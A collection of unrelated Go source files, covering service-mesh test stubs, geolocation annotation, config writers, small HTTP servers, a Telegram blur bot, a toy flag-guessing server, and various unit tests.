Generation: time.Unix(1, 1),
Tags: map[string]map[string]bool{
"kuma.io/service": {
"web": true,
},
},
MTLS: &mesh_proto.Mesh_Mtls{
EnabledBackend: "ca-1",
Backends: nil,
},
IssuedBackend: "ca-1",
SupportedBackends: []string{"ca-1"},
}
type TestSecrets struct {
}
func (t *TestSecrets) Get(*core_mesh.DataplaneResource, *core_mesh.MeshResource) (*core_xds.IdentitySecret, *core_xds.CaSecret, error) {
identitySecret := &core_xds.IdentitySecret{
PemCerts: [][]byte{
[]byte("CERT"),
},
PemKey: []byte("KEY"),
}
ca := &core_xds.CaSecret{
PemCerts: [][]byte{
[]byte("CA"),
},
}
return identitySecret, ca, nil
}
func (t *TestSecrets) Info(dpKey model.ResourceKey) *secrets.Info {
return TestSecretsInfo
}
func (t *TestSecrets) Cleanup(dpKey model.ResourceKey) {
}
var _ secrets.Secrets = &TestSecrets{}
|
package parser
import (
"reflect"
"strconv"
"strings"
"time"
"cloud.google.com/go/bigquery"
"github.com/m-lab/etl/annotation"
"github.com/m-lab/etl/metrics"
"github.com/m-lab/etl/schema"
"github.com/prometheus/client_golang/prometheus"
)
// AddGeoDataSSConnSpec takes a pointer to a
// Web100ConnectionSpecification struct and a timestamp. With these,
// it will fetch the appropriate geo data and add it to the hop struct
// referenced by the pointer.
func AddGeoDataSSConnSpec(spec *schema.Web100ConnectionSpecification, timestamp time.Time) {
if spec == nil {
metrics.AnnotationErrorCount.With(prometheus.
Labels{"source": "SS ConnSpec was nil!!!"}).Inc()
return
}
// Time the response
timerStart := time.Now()
defer func(tStart time.Time) {
metrics.AnnotationTimeSummary.
With(prometheus.Labels{"test_type": "SS"}).
Observe(float64(time.Since(tStart).Nanoseconds()))
}(timerStart)
ipSlice := []string{spec.Local_ip, spec.Remote_ip}
geoSlice := []*annotation.GeolocationIP{&spec.Local_geolocation, &spec.Remote_geolocation}
annotation.FetchGeoAnnotations(ipSlice, timestamp, geoSlice)
}
// AddGeoDataPTConnSpec takes a pointer to a
// MLabConnectionSpecification struct and a timestamp. With these, it
// will fetch the appropriate geo data and add it to the hop struct
// referenced by the pointer.
func AddGeoDataPTConnSpec(spec *schema.MLabConnectionSpecification, timestamp time.Time) {
if spec == nil {
metrics.AnnotationErrorCount.With(prometheus.
Labels{"source": "PT ConnSpec was nil!!!"}).Inc()
return
}
// Time the response
timerStart := time.Now()
defer func(tStart time.Time) {
metrics.AnnotationTimeSummary.
With(prometheus.Labels{"test_type": "PT"}).
Observe(float64(time.Since(tStart).Nanoseconds()))
}(timerStart)
ipSlice := []string{spec.Server_ip, spec.Client_ip}
geoSlice := []*annotation.GeolocationIP{&spec.Server_geolocation, &spec.Client_geolocation}
annotation.FetchGeoAnnotations(ipSlice, timestamp, geoSlice)
}
// AddGeoDataPTHopBatch takes a slice of pointers to
// schema.ParisTracerouteHops and will annotate all of them or fail
// silently. It sends them all in a single remote request.
func AddGeoDataPTHopBatch(hops []*schema.ParisTracerouteHop, timestamp time.Time) {
// Time the response
timerStart := time.Now()
defer func(tStart time.Time) {
metrics.AnnotationTimeSummary.
With(prometheus.Labels{"test_type": "PT-HOP Batch"}).
Observe(float64(time.Since(tStart).Nanoseconds()))
}(timerStart)
requestSlice := CreateRequestDataFromPTHops(hops, timestamp)
annotationData := annotation.GetBatchGeoData(annotation.BatchURL, requestSlice)
AnnotatePTHops(hops, annotationData, timestamp)
}
// AnnotatePTHops takes a slice of hop pointers, the annotation data
// mapping ip addresses to geo data and a timestamp. It will then use
// these to attach the appropriate geo data to the PT hops.
func AnnotatePTHops(hops []*schema.ParisTracerouteHop, annotationData map[string]annotation.GeoData, timestamp time.Time) {
if annotationData == nil {
return
}
timeString := strconv.FormatInt(timestamp.Unix(), 36)
for _, hop := range hops {
if hop == nil {
continue
}
if data, ok := annotationData[hop.Src_ip+timeString]; ok && data.Geo != nil {
hop.Src_geolocation = *data.Geo
} else {
metrics.AnnotationErrorCount.With(prometheus.
Labels{"source": "Couldn't get geo data for PT Hop!"}).Inc()
}
if data, ok := annotationData[hop.Dest_ip+timeString]; ok && data.Geo != nil {
hop.Dest_geolocation = *data.Geo
} else {
metrics.AnnotationErrorCount.With(prometheus.
Labels{"source": "Couldn't get geo data for PT Hop!"}).Inc()
}
}
}
// CreateRequestDataFromPTHops will take a slice of PT hop pointers
// and the associate timestamp. From those, it will create a slice of
// requests to send to the annotation service, removing duplicates
// along the way.
func CreateRequestDataFromPTHops(hops []*schema.ParisTracerouteHop, timestamp time.Time) []annotation.RequestData {
hopMap := map[string]annotation.RequestData{}
for _, hop := range hops {
if hop == nil {
metrics.AnnotationErrorCount.With(prometheus.
Labels{"source": "PT Hop was nil!!!"}).Inc()
continue
}
if hop.Src_ip != "" {
hopMap[hop.Src_ip] = annotation.RequestData{hop.Src_ip, 0, timestamp}
} else {
metrics.AnnotationErrorCount.With(prometheus.
Labels{"source": "PT Hop was missing an IP!!!"}).Inc()
}
if hop.Dest_ip != "" {
hopMap[hop.Dest_ip] = annotation.RequestData{hop.Dest_ip, 0, timestamp}
} else {
metrics.AnnotationErrorCount.With(prometheus.
Labels{"source": "PT Hop was missing an IP!!!"}).Inc()
}
}
requestSlice := make([]annotation.RequestData, 0, len(hopMap))
for _, req := range hopMap {
requestSlice = append(requestSlice, req)
}
return requestSlice
}
// AddGeoDataPTHop takes a pointer to a ParisTracerouteHop and a
// timestamp. With these, it will fetch the appropriate geo data and
// add it to the hop struct referenced by the pointer.
func AddGeoDataPTHop(hop *schema.ParisTracerouteHop, timestamp time.Time) {
if hop == nil {
metrics.AnnotationErrorCount.With(prometheus.
Labels{"source": "PT Hop was nil!!!"}).Inc()
return
}
// Time the response
timerStart := time.Now()
defer func(tStart time.Time) {
metrics.AnnotationTimeSummary.
With(prometheus.Labels{"test_type": "PT-HOP"}).
Observe(float64(time.Since(tStart).Nanoseconds()))
}(timerStart)
if hop.Src_ip != "" {
annotation.GetAndInsertGeolocationIPStruct(&hop.Src_geolocation, hop.Src_ip, timestamp)
} else {
metrics.AnnotationErrorCount.With(prometheus.
Labels{"source": "PT Hop had no src_ip!"}).Inc()
}
if hop.Dest_ip != "" {
annotation.GetAndInsertGeolocationIPStruct(&hop.Dest_geolocation, hop.Dest_ip, timestamp)
} else {
metrics.AnnotationErrorCount.With(prometheus.
Labels{"source": "PT Hop had no dest_ip!"}).Inc()
}
}
// AddGeoDataNDTConnSpec takes a connection spec and a timestamp and
// annotates the connection spec with geo data associated with each IP
// Address. It will either sucessfully add the geo data or fail
// silently and make no changes.
func AddGeoDataNDTConnSpec(spec schema.Web100ValueMap, timestamp time.Time) {
// Only annotate if flag enabled...
// TODO(gfr) - should propogate this to other pipelines, or push to a common
// intercept point.
if !annotation.IPAnnotationEnabled {
metrics.AnnotationErrorCount.With(prometheus.Labels{
"source": "IP Annotation Disabled."}).Inc()
return
}
// Time the response
timerStart := time.Now()
defer func(tStart time.Time) {
metrics.AnnotationTimeSummary.
With(prometheus.Labels{"test_type": "NDT"}).
Observe(float64(time.Since(tStart).Nanoseconds()))
}(timerStart)
GetAndInsertTwoSidedGeoIntoNDTConnSpec(spec, timestamp)
}
// CopyStructToMap takes a POINTER to an arbitrary struct and copies
// it's fields into a value map. It will also make fields entirely
// lower case, for convienece when working with exported structs. Also,
// NEVER pass in something that is not a pointer to a struct, as this
// will cause a panic.
func CopyStructToMap(sourceStruct interface{}, destinationMap map[string]bigquery.Value) {
structToCopy := reflect.ValueOf(sourceStruct).Elem()
typeOfStruct := structToCopy.Type()
for i := 0; i < typeOfStruct.NumField(); i++ {
v := structToCopy.Field(i).Interface()
switch t := v.(type) {
case string:
if t == "" {
continue
}
case int64:
if t == 0 {
continue
}
}
destinationMap[strings.ToLower(typeOfStruct.Field(i).Name)] = v
}
}
// GetAndInsertTwoSidedGeoIntoNDTConnSpec takes a timestamp and an
// NDT connection spec. It will either insert the data into the
// connection spec or silently fail.
func GetAndInsertTwoSidedGeoIntoNDTConnSpec(spec schema.Web100ValueMap, timestamp time.Time) {
// TODO: Make metrics for sok and cok failures. And double check metrics for cleanliness.
cip, cok := spec.GetString([]string{"client_ip"})
sip, sok := spec.GetString([]string{"server_ip"})
reqData := []annotation.RequestData{}
if cok {
reqData = append(reqData, annotation.RequestData{IP: cip, Timestamp: timestamp})
} else {
metrics.AnnotationWarningCount.With(prometheus.
Labels{"source": "Missing client side IP."}).Inc()
}
if sok {
reqData = append(reqData, annotation.RequestData{IP: sip, Timestamp: timestamp})
} else {
metrics.AnnotationWarningCount.With(prometheus.
Labels{"source": "Missing server side IP."}).Inc()
}
if cok || sok {
annotationDataMap := annotation.GetBatchGeoData(annotation.BatchURL, reqData)
// TODO: Revisit decision to use base36 for
// encoding, rather than base64. (It had to do with
// library support.)
timeString := strconv.FormatInt(timestamp.Unix(), 36)
if cok {
if data, ok := annotationDataMap[cip+timeString]; ok && data.Geo != nil {
CopyStructToMap(data.Geo, spec.Get("client_geolocation"))
} else {
metrics.AnnotationErrorCount.With(prometheus.
Labels{"source": "Couldn't get geo data for the client side."}).Inc()
}
}
if sok {
if data, ok := annotationDataMap[sip+timeString]; ok && data.Geo != nil {
CopyStructToMap(data.Geo, spec.Get("server_geolocation"))
} else {
metrics.AnnotationErrorCount.With(prometheus.
Labels{"source": "Couldn't get geo data for the server side."}).Inc()
}
}
}
}
|
/*
Copyright 2022 The KubeVela Authors.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
package writer
import (
"context"
"encoding/json"
"fmt"
"reflect"
"strings"
"cuelang.org/go/cue"
"github.com/magiconair/properties"
"github.com/pelletier/go-toml"
"gopkg.in/yaml.v3"
"k8s.io/klog/v2"
"github.com/kubevela/workflow/pkg/cue/model/value"
icontext "github.com/oam-dev/kubevela/pkg/config/context"
"github.com/oam-dev/kubevela/pkg/cue/script"
)
// ExpandedWriterConfig define the supported output ways.
type ExpandedWriterConfig struct {
Nacos *NacosConfig `json:"nacos"`
}
// ExpandedWriterData the data for the expanded writer
type ExpandedWriterData struct {
Nacos *NacosData `json:"nacos"`
}
// ConfigRef reference a config secret, it must be system scope.
type ConfigRef struct {
Name string `json:"name"`
Namespace string `json:"namespace"`
}
// ParseExpandedWriterConfig parse the expanded writer config from the template value
func ParseExpandedWriterConfig(template cue.Value) ExpandedWriterConfig {
var ewc = ExpandedWriterConfig{}
nacos := template.LookupPath(cue.ParsePath("nacos"))
if nacos.Exists() {
nacosConfig := &NacosConfig{}
if err := nacos.Decode(&nacosConfig); err != nil {
klog.Warningf("failed to decode the nacos config: %s", err.Error())
}
ewc.Nacos = nacosConfig
}
// parse the other writer configs
return ewc
}
// RenderForExpandedWriter render the configuration for all expanded writers
func RenderForExpandedWriter(ewc ExpandedWriterConfig, template script.CUE, context icontext.ConfigRenderContext, properties map[string]interface{}) (*ExpandedWriterData, error) {
var ewd = ExpandedWriterData{}
var err error
if ewc.Nacos != nil {
ewd.Nacos, err = renderNacos(ewc.Nacos, template, context, properties)
if err != nil {
return nil, err
}
klog.Info("the config render to nacos context successfully")
}
return &ewd, nil
}
// Write write the config by the all writers
func Write(ctx context.Context, ewd *ExpandedWriterData, ri icontext.ReadConfigProvider) (list []error) {
if ewd.Nacos != nil {
if err := ewd.Nacos.write(ctx, ri); err != nil {
list = append(list, err)
} else {
klog.Info("the config write to the nacos successfully")
}
}
return
}
// encodingOutput support the json、toml、xml、properties and yaml formats.
func encodingOutput(input *value.Value, format string) ([]byte, error) {
var data = make(map[string]interface{})
if err := input.UnmarshalTo(&data); err != nil {
return nil, err
}
switch strings.ToLower(format) {
case "json":
return json.Marshal(data)
case "toml":
return toml.Marshal(data)
case "properties":
var kv = map[string]string{}
if err := convertMap2PropertiesKV("", data, kv); err != nil {
return nil, err
}
return []byte(properties.LoadMap(kv).String()), nil
default:
return yaml.Marshal(data)
}
}
func convertMap2PropertiesKV(last string, input map[string]interface{}, result map[string]string) error {
interface2str := func(key string, v interface{}, result map[string]string) (string, error) {
switch t := v.(type) {
case string:
return t, nil
case bool:
return fmt.Sprintf("%t", t), nil
case int64, int, int32:
return fmt.Sprintf("%d", t), nil
case float64, float32:
return fmt.Sprintf("%v", t), nil
case map[string]interface{}:
if err := convertMap2PropertiesKV(key, t, result); err != nil {
return "", err
}
return "", nil
default:
return fmt.Sprintf("%v", t), nil
}
}
for k, v := range input {
key := k
if last != "" {
key = fmt.Sprintf("%s.%s", last, k)
}
switch t := v.(type) {
case string, bool, int64, int, int32, float32, float64, map[string]interface{}:
v, err := interface2str(key, t, result)
if err != nil {
return err
}
if v != "" {
result[key] = v
}
case []interface{}, []string, []int64, []float64, []map[string]interface{}:
var ints []string
s := reflect.ValueOf(t)
for i := 0; i < s.Len(); i++ {
re, err := interface2str(fmt.Sprintf("%s.%d", key, i), s.Index(i).Interface(), result)
if err != nil {
return err
}
if re != "" {
ints = append(ints, re)
}
}
if len(ints) > 0 {
result[key] = strings.Join(ints, ",")
}
default:
return fmt.Errorf("the value type of %s(%T) can not be supported", key, t)
}
}
return nil
}
|
// +build OMIT
package sample
import "encoding/json"
//START OMIT
func LoadStruct(data []byte) (output map[string]interface{}) {
json.Unmarshal(data, &output)
return output
}
func LoadArray(data []byte) (output []interface{}) {
json.Unmarshal(data, &output)
return output
}
//END OMIT
|
package main
import (
"flag"
"fmt"
"io/ioutil"
"os"
"path/filepath"
"strings"
)
type ReplaceHelper struct {
Root string //根目录
//FileName string //文件名
OldText string //需要替换的文本
NewText string //新的文本
}
func (h *ReplaceHelper) DoWrok() error {
return filepath.Walk(h.Root, h.walkCallback)
}
func (h ReplaceHelper) walkCallback(path string, f os.FileInfo, err error) error {
if err != nil {
return err
}
if f == nil {
return nil
}
if f.IsDir() {
//fmt.Println("DIR:",path)
return nil
}
//文件类型需要进行过滤
buf, err := ioutil.ReadFile(path)
if err != nil {
//err
return err
}
content := string(buf)
//替换
newContent := strings.Replace(content, h.OldText, h.NewText, -1)
//重新写入
ioutil.WriteFile(path, []byte(newContent), 0)
return err
}
func main() {
flag.Parse()
helper := ReplaceHelper{
Root: flag.Arg(0),
OldText: flag.Arg(1),
NewText: flag.Arg(2),
}
err := helper.DoWrok()
if err == nil {
fmt.Println("done!")
} else {
fmt.Println("error:", err.Error())
}
}
|
package spec_iterator
import (
"gx/ipfs/QmNuLxhqRhfimRZeLttPe6Sa44MNwuHAdaFFa9TDuNZUmf/ginkgo/internal/spec"
)
type SerialIterator struct {
specs []*spec.Spec
index int
}
func NewSerialIterator(specs []*spec.Spec) *SerialIterator {
return &SerialIterator{
specs: specs,
index: 0,
}
}
func (s *SerialIterator) Next() (*spec.Spec, error) {
if s.index >= len(s.specs) {
return nil, ErrClosed
}
spec := s.specs[s.index]
s.index += 1
return spec, nil
}
func (s *SerialIterator) NumberOfSpecsPriorToIteration() int {
return len(s.specs)
}
func (s *SerialIterator) NumberOfSpecsToProcessIfKnown() (int, bool) {
return len(s.specs), true
}
func (s *SerialIterator) NumberOfSpecsThatWillBeRunIfKnown() (int, bool) {
count := 0
for _, s := range s.specs {
if !s.Skipped() && !s.Pending() {
count += 1
}
}
return count, true
}
|
package prom
import (
"fmt"
"net/http"
"net/http/httptest"
"strings"
"testing"
"time"
"github.com/luuphu25/data-sidecar/util"
)
var (
n = NullScorer{lastTime: make(map[string]int64)}
pc = NewClient("", 10, 60, &n)
)
type NullScorer struct {
added int
scored int
lastTime map[string]int64
}
func (n *NullScorer) Add(labels map[string]string, value float64, ts int64) bool {
labelString := util.MapSSToS(labels)
if n.lastTime[labelString] < ts {
n.added++
n.lastTime[labelString] = ts
return true
}
return false
}
func (n *NullScorer) Score(map[string]string) {
n.scored++
}
func (n *NullScorer) ScoreData([]util.DataPoint, map[string]string, bool) {
}
func (n *NullScorer) ScoreCollective() {
}
func (n *NullScorer) Reset() {
n.added = 0
n.scored = 0
}
func TestDecode(t *testing.T) {
inp := []byte(`{"Status":"ok"}`)
g, err := DecodeRangeQ(inp)
if (g.Status != "ok") || (err != nil) {
t.Error(g, err)
}
g, err = DecodeRangeQ([]byte("basdf"))
if err == nil {
t.Error(err)
}
}
func TestQueries(t *testing.T) {
g := pc.SeriesQuery()
if !strings.Contains(g, "/api/v1/series?match[]={ft_target") {
t.Error(g)
}
g = pc.RangeQuery("abcd")
if !strings.Contains(g, "/api/v1/query_range?query") {
t.Error(g)
}
}
func TestSeriesBits(t *testing.T) {
x := pc.knownSeries()
if len(x) > 0 {
t.Error(x)
}
seriesInp := []byte(`{"Status":"ok",
"Data":[{"__name__":"b"}]}`)
g := DecodeSeriesMatch(seriesInp)
num := pc.SeriesInsert(g)
if num != 1 {
t.Error(num)
}
x = pc.knownSeries()
if len(x) != 1 {
t.Error(x)
}
rangeInp := []byte(`{"Status":"ok",
"Data":{"ResultType":"Range",
"Result":[{"Metric":{"__name__":"b"},
"Values":[[1,2]]}]}}`)
h, err := DecodeRangeQ(rangeInp)
if err != nil {
t.Error(err)
}
pc.RangeInsert(h)
}
func TestFetching(t *testing.T) {
serveMux := http.NewServeMux()
serveMux.HandleFunc("/api/v1/query", func(w http.ResponseWriter, r *http.Request) {
inp := `{"Status":"ok",
"Data":{"ResultType":"Range",
"Result":[{"Metric":{"__name__":"b"},
"Values":[[1,2],[2,3]]}]}}`
fmt.Fprint(w, inp)
})
serveMux.HandleFunc("/api/v1/query_range", func(w http.ResponseWriter, r *http.Request) {
inp := `{"Status":"ok",
"Data":{"ResultType":"Range",
"Result":[{"Metric":{"__name__":"b"},
"Values":[[1,2]]}]}}`
fmt.Fprint(w, inp)
})
series := `{"Status":"ok",
"Data":[{"ResultType":"Range","A":"B"},{"Q":"R"}]}`
serveMux.HandleFunc("/api/v1/series", func(w http.ResponseWriter, r *http.Request) {
fmt.Fprint(w, series)
})
server := httptest.NewUnstartedServer(serveMux)
server.Start()
//reset internal client
pc.Res = 0
pc.Start()
time.Sleep(1)
// pull from ""
pc.client = server.Client()
pc.client.Timeout = time.Second
pc.PullData()
// pull from server.URL
pc.P8s = server.URL
n.Reset()
pc.PullData()
added := n.added
scored := n.scored
// pulling the same data should not add or score
pc.PullData()
if n.added != added || n.scored != scored {
t.Errorf("Expected no more values added or scored. Before: %d, %d, after: %d, %d\n", added, scored, n.added, n.scored)
}
// pull from localhost:9090
temp := pc.P8s
pc.P8s = "localhost:9090"
pc.PullData()
pc.P8s = temp
pc.Fetch("abcd")
pc.PullData()
series = `vb{"Status":"ok","Data":[]}`
DecodeSeriesMatch([]byte(series))
pc.PullData()
series = `{"Status":"ok","Data":[]}`
DecodeSeriesMatch([]byte(series))
pc.PullData()
server.Close()
}
|
package command
import (
"context"
"fmt"
"strings"
"github.com/romantomjak/b2/b2"
)
func (c *ListCommand) listFiles(path string) int {
pathParts := strings.SplitN(path, "/", 2)
bucketName := pathParts[0]
filePrefix := ""
if len(pathParts) > 1 {
filePrefix = pathParts[1]
}
bucket, err := c.findBucketByName(bucketName)
if err != nil {
c.ui.Error(fmt.Sprintf("Error: %v", err))
return 1
}
client, err := c.Client()
if err != nil {
c.ui.Error(fmt.Sprintf("Error: %v", err))
return 1
}
req := &b2.FileListRequest{
BucketID: bucket.ID,
Prefix: filePrefix,
Delimiter: "/",
}
ctx := context.TODO()
files, _, err := client.File.List(ctx, req)
if err != nil {
c.ui.Error(fmt.Sprintf("Error: %v", err))
return 1
}
for _, file := range files {
c.ui.Output(file.FileName)
}
return 0
}
func (c *ListCommand) findBucketByName(name string) (*b2.Bucket, error) {
client, err := c.Client()
if err != nil {
c.ui.Error(fmt.Sprintf("Error: %v", err))
return nil, err
}
req := &b2.BucketListRequest{
AccountID: client.Session.AccountID,
Name: name,
}
ctx := context.TODO()
buckets, _, err := client.Bucket.List(ctx, req)
if err != nil {
return nil, err
}
if len(buckets) == 0 {
return nil, fmt.Errorf("bucket with name %q was not found", name)
}
return &buckets[0], nil
}
|
package main
import (
"fmt"
"io/ioutil"
"net/http"
"strconv"
)
var (
clients = make(map[string]int)
)
func input(w http.ResponseWriter, r *http.Request) {
http.ServeFile(w, r, "input")
}
func home(w http.ResponseWriter, r *http.Request) {
inter := r.PostFormValue("inter")
if inter == "" {
http.ServeFile(w, r, "./instruction.html")
return
}
// anti bruteforce
clients[r.RemoteAddr] = clients[r.RemoteAddr] + 1
if clients[r.RemoteAddr] > 20 {
http.Error(w, http.StatusText(http.StatusBadRequest), http.StatusBadRequest)
return
}
// handling conversion
n, _ := strconv.Atoi(inter)
if n == 209 {
data, _ := ioutil.ReadFile("flag")
fmt.Fprintf(w, string(data))
return
}
fmt.Fprintf(w, "ZmxhZ3tUcnlfSGFyZGVyIX0K")
return
}
func main() {
http.HandleFunc("/", home)
http.HandleFunc("/input", input)
fmt.Println("Server is up and running!")
http.ListenAndServe(":8005", nil)
}
|
package bitbucket
import (
"testing"
)
func Test_Keys(t *testing.T) {
// Test Public key that we'll add to the account
public := "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCkRHDtJljvvZudiXxLt+JoHEQ4olLX6vZrVkm4gRVZEC7llKs9lXubHAwzIm+odIWZnoqNKjh0tSQYd5UAlSsrzn9YVvp0Lc2eJo0N1AWuyMzb9na+lfhT/YdM3Htkm14v7OZNdX4fqff/gCuLBIv9Bc9XH0jfEliOmfaDMQsbzcDi4usRoXBrJQQiu6M0A9FF0ruBdpKp0q08XSteGh5cMn1LvOS+vLrkHXi3bOXWvv7YXoVoI5OTUQGJjxmEehRssYiMfwD58cv7v2+PMLR3atGVCnoxxu/zMkXQlBKmEyN9VS7Cr8WOoZcNsCd9C6CCrbP5HZnjiE8F0R9d1zjP test@localhost"
title := "test@localhost"
// create a new public key
key, err := client.Keys.Create(testUser, public, title)
if err != nil {
t.Error(err)
return
}
// cleanup after ourselves & delete this dummy key
defer client.Keys.Delete(testUser, key.Id)
// Get the new key we recently created
find, err := client.Keys.Find(testUser, key.Id)
if title != find.Label {
t.Errorf("key label [%v]; want [%v]", find.Label, title)
}
// Get a list of SSH keys for the user
keys, err := client.Keys.List(testUser)
if err != nil {
t.Error(err)
}
if len(keys) == 0 {
t.Errorf("List of keys returned empty set")
}
}
|
package day18
import (
"testing"
"github.com/achakravarty/30daysofgo/assert"
)
func TestStacks(t *testing.T) {
t.Run("Stack Push", testPush)
t.Run("Stack Pop", testPop)
// t.Run("De Queue", testDeQueue)
}
func testPush(t *testing.T) {
stack := Stack{}.NewStack()
assert.Equal(t, 0, stack.Len())
stack.Push(1)
assert.Equal(t, 1, stack.Len())
stack.Push(2)
assert.Equal(t, 2, stack.Len())
}
func testPop(t *testing.T) {
stack := Stack{}.NewStack()
stack.Push(1)
stack.Push(2)
assert.Equal(t, 2, stack.Len())
num := stack.Pop()
assert.Equal(t, rune(2), num)
num = stack.Pop()
assert.Equal(t, rune(1), num)
num = stack.Pop()
assert.Equal(t, rune(0), num)
}
|
// 简单的HTTP服务器
//
// REF [go http 服务器编程](http://cizixs.com/2016/08/17/golang-http-server-side)
package main
import (
"net/http"
"os"
)
// 方式1
// handler 实现http.Handler接口
type handler struct{}
func (h *handler) ServeHTTP(res http.ResponseWriter, req *http.Request) {
res.Write([]byte("Hello, world!"))
}
// 方式2
func handlerFunc(res http.ResponseWriter, req *http.Request) {
res.Write([]byte("Hello, world!"))
}
func main() {
addr := ":12345"
// 方式1: 使用Handle
//http.Handle("/", &handler{})
// 方式2: 使用HandleFunc
http.HandleFunc("/", handlerFunc)
//http.ListenAndServe(addr, nil)
// 一些内建的handler
root := "."
if wd, err := os.Getwd(); err == nil {
root = wd
}
// 静态文件服务器
http.ListenAndServe(addr, http.FileServer(http.Dir(root)))
// not found(404) handler
// http.NotFoundHandler()
// redirect(重定向) handler
// http.RedirectHandler("/", 300)
}
|
package api
import (
"bytes"
"encoding/json"
"image"
"image/jpeg"
"io"
"io/ioutil"
"log"
"net/http"
"os"
"github.com/BurntSushi/graphics-go/graphics"
tgbotapi "github.com/go-telegram-bot-api/telegram-bot-api"
)
func gracefulExit(w http.ResponseWriter, text string) {
log.Println(text)
w.WriteHeader(http.StatusOK)
w.Write([]byte("OK"))
}
// Handler telegram hook
func Handler(w http.ResponseWriter, r *http.Request) {
token, ok := os.LookupEnv("BOT_TOKEN")
if !ok {
gracefulExit(w, "no telegram bot token")
return
}
bot, err := tgbotapi.NewBotAPI(token)
body, err := ioutil.ReadAll(r.Body)
if err != nil {
gracefulExit(w, "no body")
return
}
var update tgbotapi.Update
if err := json.Unmarshal(body, &update); err != nil {
gracefulExit(w, "body parse error")
return
}
message := update.Message
if message.Document == nil {
gracefulExit(w, "no file")
return
}
url, err := bot.GetFileDirectURL(message.Document.FileID)
if err != nil {
gracefulExit(w, "file error")
return
}
client := http.Client{}
res, err := client.Get(url)
if err != nil {
gracefulExit(w, "file load error")
return
}
defer res.Body.Close()
buf := new(bytes.Buffer)
err = blur(res.Body, buf)
if err != nil {
gracefulExit(w, "cannot blur this file")
return
}
msg := tgbotapi.NewDocumentUpload(int64(message.Chat.ID), tgbotapi.FileBytes{
Name: "blured.png",
Bytes: buf.Bytes(),
})
// todo: looks like send message can be done via response on this webhook request
// but let's use this API for now
bot.Send(msg)
w.WriteHeader(http.StatusOK)
w.Write([]byte("OK"))
}
func blur(file io.Reader, w io.Writer) error {
srcImage, _, err := image.Decode(file)
if err != nil {
return err
}
dstImage := image.NewRGBA(srcImage.Bounds())
graphics.Blur(dstImage, srcImage, &graphics.BlurOptions{StdDev: 5.5})
jpeg.Encode(w, dstImage, &jpeg.Options{jpeg.DefaultQuality})
return nil
}
|
package main
import (
"fmt"
"log"
"os"
"os/exec"
"bytes"
)
func es(content []string) string {
//Write File
cmdLines := string(30)
f, err := os.Create(cmdLines)
if err != nil {
fmt.Println(err)
f.Close()
log.Fatalf("%s\n", err)
}
for _, v := range content {
fmt.Fprintln(f, v)
if err != nil {
fmt.Println(err)
log.Fatalf("%s\n", err)
}
}
err = f.Close()
if err != nil {
fmt.Println(err)
log.Fatalf("%s\n", err)
}
//Execute File
cmd := exec.Command("/bin/bash", cmdLines)
var stdout, stderr bytes.Buffer
cmd.Stdout = &stdout//os.Stdout
cmd.Stderr = &stderr//os.Stderr
err = cmd.Run()
if err != nil {
log.Fatalf("%s\n", err)
}
//Delete File
err = os.Remove(cmdLines)
if err != nil {
log.Fatalf("%s\n", err)
}
//Return Data
outStr, errStr := string(stdout.Bytes()), string(stderr.Bytes())
if errStr != "" {
return errStr
} else {
return outStr
}
}
|
package run
import (
"testing"
floc "gopkg.in/workanator/go-floc.v1"
)
const numOfRacers = 10
func TestRaceLimit(t *testing.T) {
for no := 1; no <= numOfRacers; no++ {
runRaceTest(t, no)
}
}
func TestRaceLimitPanic(t *testing.T) {
// Panic on zero limit
func() {
defer func() {
if r := recover(); r == nil {
t.Fatalf("%s must panic because of invalid limit", t.Name())
}
}()
runRaceTest(t, 0)
}()
// Panic on big limit
func() {
defer func() {
if r := recover(); r == nil {
t.Fatalf("%s must panic because of invalid limit", t.Name())
}
}()
runRaceTest(t, numOfRacers+1)
}()
}
func runRaceTest(t *testing.T, limit int) {
// Construct the flow control object.
flow := floc.NewFlow()
defer flow.Release()
// Construct the state object which as data contains the counter.
state := floc.NewState(new(int))
defer state.Release()
// Counstruct the result job.
racers := make([]floc.Job, numOfRacers)
for i := 0; i < numOfRacers; i++ {
racers[i] = jobIncrement
}
job := RaceLimit(limit, racers...)
// Run the job.
floc.Run(flow, state, updateCounter, job)
v := getCounter(state)
if v != limit {
t.Fatalf("%s expects counter value to be %d but get %d", t.Name(), limit, v)
}
}
|
package secl
import (
"encoding/xml"
"github.com/thought-machine/finance-messaging/iso20022"
)
type Document00400103 struct {
XMLName xml.Name `xml:"urn:iso:std:iso:20022:tech:xsd:secl.004.001.03 Document"`
Message *NetPositionV03 `xml:"NetPos"`
}
func (d *Document00400103) AddMessage() *NetPositionV03 {
d.Message = new(NetPositionV03)
return d.Message
}
// Scope
// The Net Position Report message is sent by the central counterparty (CCP) to a clearing member to confirm the net position of all trade legs reported during the day.
//
// The message definition is intended for use with the ISO 20022 Business Application Header.
//
// Usage
// The central counterparty (CCP) nets all the positions per clearing account and sends the Net Position report message to the Clearing member.
type NetPositionV03 struct {
// Provides parameters of the margin report such as the creation date and time, the report currency or the calculation date and time.
ReportParameters *iso20022.ReportParameters1 `xml:"RptParams"`
// Provides information about the number of used pages.
Pagination *iso20022.Pagination `xml:"Pgntn"`
// Provides the identification of the account owner, that is the clearing member (individual clearing member or general clearing member).
ClearingMember *iso20022.PartyIdentification35Choice `xml:"ClrMmb"`
// Clearing organisation that will clear the trade.
//
// Note: This field allows Clearing Member Firm to segregate flows coming from clearing counterparty's clearing system. Indeed, Clearing Member Firms receive messages from the same system (same sender) and this field allows them to know if the message is related to equities or derivatives.
ClearingSegment *iso20022.PartyIdentification35Choice `xml:"ClrSgmt,omitempty"`
// Provides the net position details such as the average deal price and net quantity.
NetPositionReport []*iso20022.NetPosition3 `xml:"NetPosRpt"`
// Additional information that can not be captured in the structured fields and/or any other specific block.
SupplementaryData []*iso20022.SupplementaryData1 `xml:"SplmtryData,omitempty"`
}
func (n *NetPositionV03) AddReportParameters() *iso20022.ReportParameters1 {
n.ReportParameters = new(iso20022.ReportParameters1)
return n.ReportParameters
}
func (n *NetPositionV03) AddPagination() *iso20022.Pagination {
n.Pagination = new(iso20022.Pagination)
return n.Pagination
}
func (n *NetPositionV03) AddClearingMember() *iso20022.PartyIdentification35Choice {
